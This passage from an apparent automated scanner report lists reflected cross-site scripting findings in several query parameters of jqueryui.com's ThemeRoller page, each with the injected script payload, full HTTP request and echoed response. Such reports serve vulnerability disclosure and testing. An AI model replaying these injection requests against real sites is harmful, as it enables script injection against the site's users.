<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
cityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=2222227c309"><script>alert(1)</script>9ef676458d7&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTexture
...[SNIP]...

3.174. http://jqueryui.com/themeroller/ [fcDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff5c6"><script>alert(1)</script>4bb9610b710 was submitted in the fcDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000ff5c6"><script>alert(1)</script>4bb9610b710&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:25 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
Content=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000ff5c6"><script>alert(1)</script>4bb9610b710&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_i
...[SNIP]...

3.175. http://jqueryui.com/themeroller/ [fcError parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload caf44"><script>alert(1)</script>c36131bd0f6 was submitted in the fcError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0acaf44"><script>alert(1)</script>c36131bd0f6&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:52 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
gOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0acaf44"><script>alert(1)</script>c36131bd0f6&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&
...[SNIP]...

3.176. http://jqueryui.com/themeroller/ [fcHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a923"><script>alert(1)</script>0d310ed75a9 was submitted in the fcHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff7a923"><script>alert(1)</script>0d310ed75a9&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:11 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff7a923"><script>alert(1)</script>0d310ed75a9&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextu
...[SNIP]...

3.177. http://jqueryui.com/themeroller/ [fcHighlight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5b78"><script>alert(1)</script>878fe90d931 was submitted in the fcHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636f5b78"><script>alert(1)</script>878fe90d931&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:45 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
Active=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636f5b78"><script>alert(1)</script>878fe90d931&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_fl
...[SNIP]...

3.178. http://jqueryui.com/themeroller/ [fcHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1722"><script>alert(1)</script>3fa67dfb137 was submitted in the fcHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74c1722"><script>alert(1)</script>3fa67dfb137&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:32 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
gImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74c1722"><script>alert(1)</script>3fa67dfb137&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHig
...[SNIP]...

3.179. http://jqueryui.com/themeroller/ [ffDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the ffDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40feb"><script>alert(1)</script>2127341874 was submitted in the ffDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif40feb"><script>alert(1)</script>2127341874&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:01 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120127

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=arial,%20helvetica,%20sans-serif40feb"><script>alert(1)</script>2127341874&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorC
...[SNIP]...

3.180. http://jqueryui.com/themeroller/ [fsDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fsDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd562"><script>alert(1)</script>d38fcc48096 was submitted in the fsDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12pxcd562"><script>alert(1)</script>d38fcc48096&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:04 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12pxcd562"><script>alert(1)</script>d38fcc48096&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent
...[SNIP]...

3.181. http://jqueryui.com/themeroller/ [fwDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fwDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36130"><script>alert(1)</script>7eb2177a8ce was submitted in the fwDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold36130"><script>alert(1)</script>7eb2177a8ce&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:02 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120065

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold36130"><script>alert(1)</script>7eb2177a8ce&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&b
...[SNIP]...

3.182. http://jqueryui.com/themeroller/ [iconColorActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorActive request parameter is copied, with no HTML-attribute encoding, into a double-quoted attribute value: the application echoes its whole query string back in the href of the stylesheet <link> that loads /themeroller/css/parseTheme.css.php. The payload e9a1e"><script>alert(1)</script>1bc403df73c was submitted in the iconColorActive parameter and appears unmodified in the response, where its double quote ends the href attribute and the > that follows ends the tag.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01e9a1e"><script>alert(1)</script>1bc403df73c&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:39 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
orderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01e9a1e"><script>alert(1)</script>1bc403df73c&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png
...[SNIP]...

3.183. http://jqueryui.com/themeroller/ [iconColorContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorContent request parameter is copied, with no HTML-attribute encoding, into a double-quoted attribute value: the application echoes its whole query string back in the href of the stylesheet <link> that loads /themeroller/css/parseTheme.css.php. The payload fad48"><script>alert(1)</script>c3cfabee311 was submitted in the iconColorContent parameter and appears unmodified in the response, where its double quote ends the href attribute and the > that follows ends the tag.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response.

Request

